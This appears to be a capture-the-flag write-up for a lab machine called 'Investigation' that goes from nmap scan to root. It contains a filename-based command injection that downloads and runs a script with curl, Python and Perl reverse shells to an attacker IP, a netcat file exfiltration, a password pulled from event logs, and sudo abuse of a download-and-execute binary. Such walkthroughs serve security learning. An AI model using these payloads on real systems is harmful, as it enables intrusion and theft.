Investigation
Nmap tells us that there's two ports open:
nmap -sC -sV -oA nmap/ -T4 10.129.138.100
# Nmap 7.93 scan initiated Sun Jan 22 11:12:19 2023 as: /snap/nmap/2864/usr/bin/nmap -sC -sV -oA nmap/ -T4 10.129.53.197
Nmap scan report for 10.129.53.197
Host is up (0.076s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 2f1e6306aa6ebbcc0d19d4152674c6d9 (RSA)
| 256 274520add2faa73a8373d97c79abf30b (ECDSA)
|_ 256 4245eb916e21020617b2748bc5834fe0 (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://eforenzics.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: eforenzics.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 22 11:12:29 2023 -- 1 IP address (1 host up) scanned in 9.63 seconds
There seems to be a domain attached to the ip, let's add it to to our /etc/hosts:
The website seems to be built on PHP. There's a file upload thing on /upload.php
After the upload the page gives us a link to the forensics result:
The "forensics" seems to be just exiftool output. Exiftool is a command line program so chances are the app also uses direct linux commands to generate the result. Let's play with the file upload a bit. Upload some jpeg image on the form again, but this time intercept the request with Burpsuite
Here we simply edited the filename of the image to include sleep, and the request actually takes 5 seconds to execute! Next, let's get a reverse shell. Note: there is some sort of black characters (atleast |) so the next command mayb look a bit uncommon.
First. Let's create a folder www and host a file index.html there. Contents of the index.html are like:
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Next, navigate to the www-folder and start python web server:
python3 -m http.server
Before executing our script on fileupload, start a netcat listener on port 9001:
nc -lnvp 9001
Next, upload another file and intercept it with Burp, before sending it change to filename to the following:
curl 10.10.14.40:8000 --output test && sh test && sleep 10 |
Basically, it downloads the contents of our index.html file and executes it with sh. After sending the request we get a shell as www-data!
On the server there seems to be another user called smorton. We have no access to his home-directory. After enumerating a bit we can see that there's another folder which belongs to smorton and we can access:
find / -group smorton 2>/dev/null
/home/smorton
/usr/local/investigation/Windows Event Logs for Analysis.msg
Let's send the file to our local machine by using netcat: on the local machine run:
nc -l -p 1234 -q 1 > message.msg < /dev/null
And on server run:
cat '/usr/local/investigation/Windows Event Logs for Analysis.msg
' | nc 10.10.14.40 1234
After downloading the file let's analyze it. file tells us that it's a Microsoft outlook message file:
joonas@joonas-VirtualBox:~/Documents/htb/investigation$ file message.msg
message.msg: CDFV2 Microsoft Outlook Message
We can convert the file into readable format by running msgconvert:
msgconvert message.msg
This generated message.eml file which contains emails in text format:
Interesting, there's some talks about logs, rest of the text seems to be on base64-format. After decoding (You can use CyberChef or base64 -command line utility for that the file is long so I will not show it here) we seem to be dealing with a zip file, after unzipping that we get a file called security.evtx. Running file on that tells us that it's a Windows log file (no surprices here)
file security.evtx
security.evtx: MS Windows Vista Event Log, 238 chunks (no. 237 in use), next record no. 20013
We can use evtx_dump.py to convert the file into xml (You can also send it to Windows VM and analyze it there)
evtx_dump.py security.evtx > security.xml
Now we have access to the log file!
The next step can be a bit tedious. My reasoning here was that maybe someone accidently typed password on the username field and the Windows event logs saved the password on the log? Far fetched? Maybe, But it worked! Running
cat security.xml |grep TargetUserName |grep -v "Jenkins\|EFORENZICS\|SYSTEM\|ljenkins\|Administrators\|SMorton\|AAnderson"
On the log file shows us that there is some kind of password!
.....
<Data Name="TargetUserName">Def@ultf0r3nz!csPa$$</Data>
.....
Luckily, this password is also valid for user smorton on ssh!
Running sudo -l on smorton reveals us that we can run a binary as root:
smorton@investigation:~$ sudo -l
Matching Defaults entries for smorton on investigation:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User smorton may run the following commands on investigation:
(root) NOPASSWD: /usr/bin/binary
smorton@investigation:~$
Let's download the binary to our local machine and analyze it on Ghidra.
Ghidra actually does a pretty good job on displaying the c-code. The app requires 3 params (binary-name included) and last param must be 'lDnxUysaQn'. Then it takes the output of the second param, uses that as an url on curl-command, runs the output with perl and cleans up after that. In other words, it downloads and executes a perl-script. Let's setup a perl reverse shell on our local machine:
use Socket;$i="10.10.14.40";$p=9001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
And once again, setup netcat listener:
nc -lnvp 9001
And finally, run the binary:
sudo /usr/bin/binary http://10.10.14.40:8000/shell.pl lDnxUysaQn
Running...
And our netcat listener should have a root shell:
joonas@joonas-VirtualBox:~/Documents/htb/investigation$ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.138.100 35924
# whoami
root
#
GG